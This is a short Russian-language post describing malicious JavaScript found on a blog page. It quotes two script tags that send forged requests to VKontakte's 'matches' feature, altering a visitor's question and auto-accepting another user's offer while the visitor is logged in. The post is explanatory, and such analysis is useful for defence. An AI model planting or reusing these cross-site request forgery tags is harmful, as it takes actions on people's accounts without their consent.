Вредоносный код расположен на этой странице одного блога и представляет собой небольшой яваскрипт:
<script src=»http://vkontakte.ru/matches.php?act=a_save&question=peredat+privet+Vadimu+Bilalovu»></script><br />
<script src=»http://vkontakte.ru/matches.php?act=a_sent&to_id=24573&dec=1″></script>
Как видете этот код изменяет предложение, если оно включено у пользователя, на «Хотите ли вы peredat privet Vadimu Bilalovu?» и отвечает «да» на предложение этого человека.
